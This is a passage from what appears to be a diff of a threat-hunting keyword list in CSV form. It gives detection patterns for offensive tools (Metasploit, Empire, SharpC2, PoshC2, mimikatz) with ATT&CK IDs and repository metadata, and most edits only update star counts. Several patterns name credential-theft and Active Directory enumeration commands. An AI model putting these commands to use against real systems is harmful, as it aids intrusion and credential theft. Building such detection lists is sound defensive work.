a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31317","13504","2023-10-04T21:36:25Z","2011-08-30T06:13:20Z" +"*stager_sock_find.asm*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31317","13504","2023-10-04T21:36:25Z","2011-08-30T06:13:20Z" +"*stagers/*/aes.py*","offensive_tool_keyword","empire","Empire scripts paths. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1048","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","1","N/A","N/A","10","7103","2790","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" +"*stagers/*/diffiehellman.py*","offensive_tool_keyword","empire","Empire scripts paths. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1050","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","1","N/A","N/A","10","7103","2790","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" +"*stagers/*/get_sysinfo.py*","offensive_tool_keyword","empire","Empire scripts paths. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1047","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","1","N/A","N/A","10","7103","2790","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" +"*stagers/*/rc4.py*","offensive_tool_keyword","empire","Empire scripts paths. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1049","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","1","N/A","N/A","10","7103","2790","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" "*Stagers\ExeStager\*","offensive_tool_keyword","SharpC2","Command and Control Framework written in C#","T1071 - T1024 - T1105 - T1043 - T1090 - T1091 - T1021 - T1573","TA0001 - TA0011 - TA0002","N/A","N/A","C2","https://github.com/rasta-mouse/SharpC2","1","1","N/A","10","10","303","45","2023-07-27T12:25:54Z","2022-10-26T12:18:07Z" "*Stagers\SvcStager\*","offensive_tool_keyword","SharpC2","Command and Control Framework written in C#","T1071 - T1024 - T1105 - T1043 - T1090 - T1091 - T1021 - T1573","TA0001 - TA0011 - TA0002","N/A","N/A","C2","https://github.com/rasta-mouse/SharpC2","1","1","N/A","10","10","303","45","2023-07-27T12:25:54Z","2022-10-26T12:18:07Z" "*stagerx64.bin*","offensive_tool_keyword","AlanFramework","Alan Framework is a post-exploitation framework useful during red-team activities.","T1055 - T1071 - T1060 - T1560 - T1021 - T1005 - T1018","TA0002 - TA0005 - TA0011 - TA0008 - TA0010","N/A","N/A","C2","https://github.com/enkomio/AlanFramework","1","1","N/A","10","10","430","66","2022-08-23T18:20:33Z","2021-01-26T22:56:50Z" -"*standard::answer*","offensive_tool_keyword","mimikatz","Mimikatz keywords and commands Well known to extract plaintexts passwords. hash. PIN code and kerberos tickets from memory. mimikatz can also perform pass-the-hash. pass-the-ticket or build Golden tickets. keyword taken from hayabusa-rules win_alert_mimikatz_keywords.yml","T1003 - T1021.001 - T1053 - T1055 - T1057 - T1059.003 - T1070 - T1071 - T1078.002 - T1078.003 - T1078.005 - T1106 - T1136 - T1204 - T1218 - T1547 - T1555.003 - T1555.004 - T1573 - T1574 - T1596 - T1543","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0010 - TA0040","N/A","N/A","Exploitation tools","https://github.com/gentilkiwi/mimikatz","1","1","N/A","10","10","17798","3445","2023-08-03T09:01:21Z","2014-04-06T18:30:02Z" -"*standard::base64*","offensive_tool_keyword","mimikatz","Mimikatz keywords and commands Well known to extract plaintexts passwords. hash. PIN code and kerberos tickets from memory. mimikatz can also perform pass-the-hash. pass-the-ticket or build Golden tickets. keyword taken from hayabusa-rules win_alert_mimikatz_keywords.yml","T1003 - T1021.001 - T1053 - T1055 - T1057 - T1059.003 - T1070 - T1071 - T1078.002 - T1078.003 - T1078.005 - T1106 - T1136 - T1204 - T1218 - T1547 - T1555.003 - T1555.004 - T1573 - T1574 - T1596 - T1543","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0010 - TA0040","N/A","N/A","Exploitation tools","https://github.com/gentilkiwi/mimikatz","1","1","N/A","10","10","17798","3445","2023-08-03T09:01:21Z","2014-04-06T18:30:02Z" -"*standard::cd*","offensive_tool_keyword","mimikatz","Mimikatz keywords and commands Well known to extract plaintexts passwords. hash. PIN code and kerberos tickets from memory. mimikatz can also perform pass-the-hash. pass-the-ticket or build Golden tickets. keyword taken from hayabusa-rules win_alert_mimikatz_keywords.yml","T1003 - T1021.001 - T1053 - T1055 - T1057 - T1059.003 - T1070 - T1071 - T1078.002 - T1078.003 - T1078.005 - T1106 - T1136 - T1204 - T1218 - T1547 - T1555.003 - T1555.004 - T1573 - T1574 - T1596 - T1543","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0010 - TA0040","N/A","N/A","Exploitation tools","https://github.com/gentilkiwi/mimikatz","1","1","N/A","10","10","17798","3445","2023-08-03T09:01:21Z","2014-04-06T18:30:02Z" -"*standard::cls*","offensive_tool_keyword","mimikatz","Mimikatz keywords and commands Well known to extract plaintexts passwords. hash. PIN code and kerberos tickets from memory. mimikatz can also perform pass-the-hash. pass-the-ticket or build Golden tickets. keyword taken from hayabusa-rules win_alert_mimikatz_keywords.yml","T1003 - T1021.001 - T1053 - T1055 - T1057 - T1059.003 - T1070 - T1071 - T1078.002 - T1078.003 - T1078.005 - T1106 - T1136 - T1204 - T1218 - T1547 - T1555.003 - T1555.004 - T1573 - T1574 - T1596 - T1543","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0010 - TA0040","N/A","N/A","Exploitation tools","https://github.com/gentilkiwi/mimikatz","1","1","N/A","10","10","17798","3445","2023-08-03T09:01:21Z","2014-04-06T18:30:02Z" -"*standard::coffee*","offensive_tool_keyword","mimikatz","Mimikatz keywords and commands Well known to extract plaintexts passwords. hash. PIN code and kerberos tickets from memory. mimikatz can also perform pass-the-hash. pass-the-ticket or build Golden tickets. keyword taken from hayabusa-rules win_alert_mimikatz_keywords.yml","T1003 - T1021.001 - T1053 - T1055 - T1057 - T1059.003 - T1070 - T1071 - T1078.002 - T1078.003 - T1078.005 - T1106 - T1136 - T1204 - T1218 - T1547 - T1555.003 - T1555.004 - T1573 - T1574 - T1596 - T1543","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0010 - TA0040","N/A","N/A","Exploitation tools","https://github.com/gentilkiwi/mimikatz","1","1","N/A","10","10","17798","3445","2023-08-03T09:01:21Z","2014-04-06T18:30:02Z" -"*standard::exit*","offensive_tool_keyword","mimikatz","Mimikatz keywords and commands Well known to extract plaintexts passwords. hash. PIN code and kerberos tickets from memory. mimikatz can also perform pass-the-hash. pass-the-ticket or build Golden tickets. keyword taken from hayabusa-rules win_alert_mimikatz_keywords.yml","T1003 - T1021.001 - T1053 - T1055 - T1057 - T1059.003 - T1070 - T1071 - T1078.002 - T1078.003 - T1078.005 - T1106 - T1136 - T1204 - T1218 - T1547 - T1555.003 - T1555.004 - T1573 - T1574 - T1596 - T1543","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0010 - TA0040","N/A","N/A","Exploitation tools","https://github.com/gentilkiwi/mimikatz","1","1","N/A","10","10","17798","3445","2023-08-03T09:01:21Z","2014-04-06T18:30:02Z" -"*standard::hostname*","offensive_tool_keyword","mimikatz","Mimikatz keywords and commands Well known to extract plaintexts passwords. hash. PIN code and kerberos tickets from memory. mimikatz can also perform pass-the-hash. pass-the-ticket or build Golden tickets. keyword taken from hayabusa-rules win_alert_mimikatz_keywords.yml","T1003 - T1021.001 - T1053 - T1055 - T1057 - T1059.003 - T1070 - T1071 - T1078.002 - T1078.003 - T1078.005 - T1106 - T1136 - T1204 - T1218 - T1547 - T1555.003 - T1555.004 - T1573 - T1574 - T1596 - T1543","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0010 - TA0040","N/A","N/A","Exploitation tools","https://github.com/gentilkiwi/mimikatz","1","1","N/A","10","10","17798","3445","2023-08-03T09:01:21Z","2014-04-06T18:30:02Z" -"*standard::localtime*","offensive_tool_keyword","mimikatz","Mimikatz keywords and commands Well known to extract plaintexts passwords. hash. PIN code and kerberos tickets from memory. mimikatz can also perform pass-the-hash. pass-the-ticket or build Golden tickets. keyword taken from hayabusa-rules win_alert_mimikatz_keywords.yml","T1003 - T1021.001 - T1053 - T1055 - T1057 - T1059.003 - T1070 - T1071 - T1078.002 - T1078.003 - T1078.005 - T1106 - T1136 - T1204 - T1218 - T1547 - T1555.003 - T1555.004 - T1573 - T1574 - T1596 - T1543","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0010 - TA0040","N/A","N/A","Exploitation tools","https://github.com/gentilkiwi/mimikatz","1","1","N/A","10","10","17798","3445","2023-08-03T09:01:21Z","2014-04-06T18:30:02Z" -"*standard::log*","offensive_tool_keyword","mimikatz","Mimikatz keywords and commands Well known to extract plaintexts passwords. hash. PIN code and kerberos tickets from memory. mimikatz can also perform pass-the-hash. pass-the-ticket or build Golden tickets. keyword taken from hayabusa-rules win_alert_mimikatz_keywords.yml","T1003 - T1021.001 - T1053 - T1055 - T1057 - T1059.003 - T1070 - T1071 - T1078.002 - T1078.003 - T1078.005 - T1106 - T1136 - T1204 - T1218 - T1547 - T1555.003 - T1555.004 - T1573 - T1574 - T1596 - T1543","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0010 - TA0040","N/A","N/A","Exploitation tools","https://github.com/gentilkiwi/mimikatz","1","1","N/A","10","10","17798","3445","2023-08-03T09:01:21Z","2014-04-06T18:30:02Z" -"*standard::sleep*","offensive_tool_keyword","mimikatz","Mimikatz keywords and commands Well known to extract plaintexts passwords. hash. PIN code and kerberos tickets from memory. mimikatz can also perform pass-the-hash. pass-the-ticket or build Golden tickets. keyword taken from hayabusa-rules win_alert_mimikatz_keywords.yml","T1003 - T1021.001 - T1053 - T1055 - T1057 - T1059.003 - T1070 - T1071 - T1078.002 - T1078.003 - T1078.005 - T1106 - T1136 - T1204 - T1218 - T1547 - T1555.003 - T1555.004 - T1573 - T1574 - T1596 - T1543","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0010 - TA0040","N/A","N/A","Exploitation tools","https://github.com/gentilkiwi/mimikatz","1","1","N/A","10","10","17798","3445","2023-08-03T09:01:21Z","2014-04-06T18:30:02Z" -"*standard::version*","offensive_tool_keyword","mimikatz","Mimikatz keywords and commands Well known to extract plaintexts passwords. hash. PIN code and kerberos tickets from memory. mimikatz can also perform pass-the-hash. pass-the-ticket or build Golden tickets. keyword taken from hayabusa-rules win_alert_mimikatz_keywords.yml","T1003 - T1021.001 - T1053 - T1055 - T1057 - T1059.003 - T1070 - T1071 - T1078.002 - T1078.003 - T1078.005 - T1106 - T1136 - T1204 - T1218 - T1547 - T1555.003 - T1555.004 - T1573 - T1574 - T1596 - T1543","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0010 - TA0040","N/A","N/A","Exploitation tools","https://github.com/gentilkiwi/mimikatz","1","1","N/A","10","10","17798","3445","2023-08-03T09:01:21Z","2014-04-06T18:30:02Z" -"*standin --asrep*","offensive_tool_keyword","poshc2","keywords from poshc2 usage - a proxy aware C2 framework used to aid red teamers with post-exploitation and lateral movement.","T1548.002 - T1134.002 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560.001 - T1119 - T1110 - T1555 - T1482 - T1546.003 - T1068 - T1210 - T1083 - T1056.001 - T1046 - T1040 - T1003.001 - T1201 - T1069.001 - T1055 - T1090 - T1082 - T1016 - T1049 - T1007 - T1569.002 - T1552.001 - T1550.002 - T1047","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011","N/A","APT33 - HEXANE","C2","https://github.com/nettitude/PoshC2","1","0","N/A","10","10","1601","312","2023-09-08T05:42:06Z","2018-07-23T08:53:32Z" -"*standin --dc*","offensive_tool_keyword","poshc2","keywords from poshc2 usage - a proxy aware C2 framework used to aid red teamers with post-exploitation and lateral movement.","T1548.002 - T1134.002 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560.001 - T1119 - T1110 - T1555 - T1482 - T1546.003 - T1068 - T1210 - T1083 - T1056.001 - T1046 - T1040 - T1003.001 - T1201 - T1069.001 - T1055 - T1090 - T1082 - T1016 - T1049 - T1007 - T1569.002 - T1552.001 - T1550.002 - T1047","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011","N/A","APT33 - HEXANE","C2","https://github.com/nettitude/PoshC2","1","0","N/A","10","10","1601","312","2023-09-08T05:42:06Z","2018-07-23T08:53:32Z" -"*standin --delegation*","offensive_tool_keyword","poshc2","keywords from poshc2 usage - a proxy aware C2 framework used to aid red teamers with post-exploitation and lateral movement.","T1548.002 - T1134.002 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560.001 - T1119 - T1110 - T1555 - T1482 - T1546.003 - T1068 - T1210 - T1083 - T1056.001 - T1046 - T1040 - T1003.001 - T1201 - T1069.001 - T1055 - T1090 - T1082 - T1016 - T1049 - T1007 - T1569.002 - T1552.001 - T1550.002 - T1047","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011","N/A","APT33 - HEXANE","C2","https://github.com/nettitude/PoshC2","1","0","N/A","10","10","1601","312","2023-09-08T05:42:06Z","2018-07-23T08:53:32Z" -"*standin --group *Domain Admins*","offensive_tool_keyword","poshc2","keywords from poshc2 usage - a proxy aware C2 framework used to aid red teamers with post-exploitation and lateral movement.","T1548.002 - T1134.002 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560.001 - T1119 - T1110 - T1555 - T1482 - T1546.003 - T1068 - T1210 - T1083 - T1056.001 - T1046 - T1040 - T1003.001 - T1201 - T1069.001 - T1055 - T1090 - T1082 - T1016 - T1049 - T1007 - T1569.002 - T1552.001 - T1550.002 - T1047","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011","N/A","APT33 - HEXANE","C2","https://github.com/nettitude/PoshC2","1","0","N/A","10","10","1601","312","2023-09-08T05:42:06Z","2018-07-23T08:53:32Z" -"*standin --object *","offensive_tool_keyword","poshc2","keywords from poshc2 usage - a proxy aware C2 framework used to aid red teamers with post-exploitation and lateral movement.","T1548.002 - T1134.002 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560.001 - T1119 - T1110 - T1555 - T1482 - T1546.003 - T1068 - T1210 - T1083 - T1056.001 - T1046 - T1040 - T1003.001 - T1201 - T1069.001 - T1055 - T1090 - T1082 - T1016 - T1049 - T1007 - T1569.002 - T1552.001 - T1550.002 - T1047","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011","N/A","APT33 - HEXANE","C2","https://github.com/nettitude/PoshC2","1","0","N/A","10","10","1601","312","2023-09-08T05:42:06Z","2018-07-23T08:53:32Z" -"*standin --spn*","offensive_tool_keyword","poshc2","keywords from poshc2 usage - a proxy aware C2 framework used to aid red teamers with post-exploitation and lateral movement.","T1548.002 - T1134.002 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560.001 - T1119 - T1110 - T1555 - T1482 - T1546.003 - T1068 - T1210 - T1083 - T1056.001 - T1046 - T1040 - T1003.001 - T1201 - T1069.001 - T1055 - T1090 - T1082 - T1016 - T1049 - T1007 - T1569.002 - T1552.001 - T1550.002 - T1047","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011","N/A","APT33 - HEXANE","C2","https://github.com/nettitude/PoshC2","1","0","N/A","10","10","1601","312","2023-09-08T05:42:06Z","2018-07-23T08:53:32Z" +"*standard::answer*","offensive_tool_keyword","mimikatz","Mimikatz keywords and commands Well known to extract plaintexts passwords. hash. PIN code and kerberos tickets from memory. mimikatz can also perform pass-the-hash. pass-the-ticket or build Golden tickets. keyword taken from hayabusa-rules win_alert_mimikatz_keywords.yml","T1003 - T1021.001 - T1053 - T1055 - T1057 - T1059.003 - T1070 - T1071 - T1078.002 - T1078.003 - T1078.005 - T1106 - T1136 - T1204 - T1218 - T1547 - T1555.003 - T1555.004 - T1573 - T1574 - T1596 - T1543","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0010 - TA0040","N/A","N/A","Exploitation tools","https://github.com/gentilkiwi/mimikatz","1","1","N/A","10","10","17801","3446","2023-08-03T09:01:21Z","2014-04-06T18:30:02Z" +"*standard::base64*","offensive_tool_keyword","mimikatz","Mimikatz keywords and commands Well known to extract plaintexts passwords. hash. PIN code and kerberos tickets from memory. mimikatz can also perform pass-the-hash. pass-the-ticket or build Golden tickets. keyword taken from hayabusa-rules win_alert_mimikatz_keywords.yml","T1003 - T1021.001 - T1053 - T1055 - T1057 - T1059.003 - T1070 - T1071 - T1078.002 - T1078.003 - T1078.005 - T1106 - T1136 - T1204 - T1218 - T1547 - T1555.003 - T1555.004 - T1573 - T1574 - T1596 - T1543","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0010 - TA0040","N/A","N/A","Exploitation tools","https://github.com/gentilkiwi/mimikatz","1","1","N/A","10","10","17801","3446","2023-08-03T09:01:21Z","2014-04-06T18:30:02Z" +"*standard::cd*","offensive_tool_keyword","mimikatz","Mimikatz keywords and commands Well known to extract plaintexts passwords. hash. PIN code and kerberos tickets from memory. mimikatz can also perform pass-the-hash. pass-the-ticket or build Golden tickets. keyword taken from hayabusa-rules win_alert_mimikatz_keywords.yml","T1003 - T1021.001 - T1053 - T1055 - T1057 - T1059.003 - T1070 - T1071 - T1078.002 - T1078.003 - T1078.005 - T1106 - T1136 - T1204 - T1218 - T1547 - T1555.003 - T1555.004 - T1573 - T1574 - T1596 - T1543","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0010 - TA0040","N/A","N/A","Exploitation tools","https://github.com/gentilkiwi/mimikatz","1","1","N/A","10","10","17801","3446","2023-08-03T09:01:21Z","2014-04-06T18:30:02Z" +"*standard::cls*","offensive_tool_keyword","mimikatz","Mimikatz keywords and commands Well known to extract plaintexts passwords. hash. PIN code and kerberos tickets from memory. mimikatz can also perform pass-the-hash. pass-the-ticket or build Golden tickets. keyword taken from hayabusa-rules win_alert_mimikatz_keywords.yml","T1003 - T1021.001 - T1053 - T1055 - T1057 - T1059.003 - T1070 - T1071 - T1078.002 - T1078.003 - T1078.005 - T1106 - T1136 - T1204 - T1218 - T1547 - T1555.003 - T1555.004 - T1573 - T1574 - T1596 - T1543","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0010 - TA0040","N/A","N/A","Exploitation tools","https://github.com/gentilkiwi/mimikatz","1","1","N/A","10","10","17801","3446","2023-08-03T09:01:21Z","2014-04-06T18:30:02Z" +"*standard::coffee*","offensive_tool_keyword","mimikatz","Mimikatz keywords and commands Well known to extract plaintexts passwords. hash. PIN code and kerberos tickets from memory. mimikatz can also perform pass-the-hash. pass-the-ticket or build Golden tickets. keyword taken from hayabusa-rules win_alert_mimikatz_keywords.yml","T1003 - T1021.001 - T1053 - T1055 - T1057 - T1059.003 - T1070 - T1071 - T1078.002 - T1078.003 - T1078.005 - T1106 - T1136 - T1204 - T1218 - T1547 - T1555.003 - T1555.004 - T1573 - T1574 - T1596 - T1543","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0010 - TA0040","N/A","N/A","Exploitation tools","https://github.com/gentilkiwi/mimikatz","1","1","N/A","10","10","17801","3446","2023-08-03T09:01:21Z","2014-04-06T18:30:02Z" +"*standard::exit*","offensive_tool_keyword","mimikatz","Mimikatz keywords and commands Well known to extract plaintexts passwords. hash. PIN code and kerberos tickets from memory. mimikatz can also perform pass-the-hash. pass-the-ticket or build Golden tickets. keyword taken from hayabusa-rules win_alert_mimikatz_keywords.yml","T1003 - T1021.001 - T1053 - T1055 - T1057 - T1059.003 - T1070 - T1071 - T1078.002 - T1078.003 - T1078.005 - T1106 - T1136 - T1204 - T1218 - T1547 - T1555.003 - T1555.004 - T1573 - T1574 - T1596 - T1543","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0010 - TA0040","N/A","N/A","Exploitation tools","https://github.com/gentilkiwi/mimikatz","1","1","N/A","10","10","17801","3446","2023-08-03T09:01:21Z","2014-04-06T18:30:02Z" +"*standard::hostname*","offensive_tool_keyword","mimikatz","Mimikatz keywords and commands Well known to extract plaintexts passwords. hash. PIN code and kerberos tickets from memory. mimikatz can also perform pass-the-hash. pass-the-ticket or build Golden tickets. keyword taken from hayabusa-rules win_alert_mimikatz_keywords.yml","T1003 - T1021.001 - T1053 - T1055 - T1057 - T1059.003 - T1070 - T1071 - T1078.002 - T1078.003 - T1078.005 - T1106 - T1136 - T1204 - T1218 - T1547 - T1555.003 - T1555.004 - T1573 - T1574 - T1596 - T1543","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0010 - TA0040","N/A","N/A","Exploitation tools","https://github.com/gentilkiwi/mimikatz","1","1","N/A","10","10","17801","3446","2023-08-03T09:01:21Z","2014-04-06T18:30:02Z" +"*standard::localtime*","offensive_tool_keyword","mimikatz","Mimikatz keywords and commands Well known to extract plaintexts passwords. hash. PIN code and kerberos tickets from memory. mimikatz can also perform pass-the-hash. pass-the-ticket or build Golden tickets. keyword taken from hayabusa-rules win_alert_mimikatz_keywords.yml","T1003 - T1021.001 - T1053 - T1055 - T1057 - T1059.003 - T1070 - T1071 - T1078.002 - T1078.003 - T1078.005 - T1106 - T1136 - T1204 - T1218 - T1547 - T1555.003 - T1555.004 - T1573 - T1574 - T1596 - T1543","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0010 - TA0040","N/A","N/A","Exploitation tools","https://github.com/gentilkiwi/mimikatz","1","1","N/A","10","10","17801","3446","2023-08-03T09:01:21Z","2014-04-06T18:30:02Z" +"*standard::log*","offensive_tool_keyword","mimikatz","Mimikatz keywords and commands Well known to extract plaintexts passwords. hash. PIN code and kerberos tickets from memory. mimikatz can also perform pass-the-hash. pass-the-ticket or build Golden tickets. keyword taken from hayabusa-rules win_alert_mimikatz_keywords.yml","T1003 - T1021.001 - T1053 - T1055 - T1057 - T1059.003 - T1070 - T1071 - T1078.002 - T1078.003 - T1078.005 - T1106 - T1136 - T1204 - T1218 - T1547 - T1555.003 - T1555.004 - T1573 - T1574 - 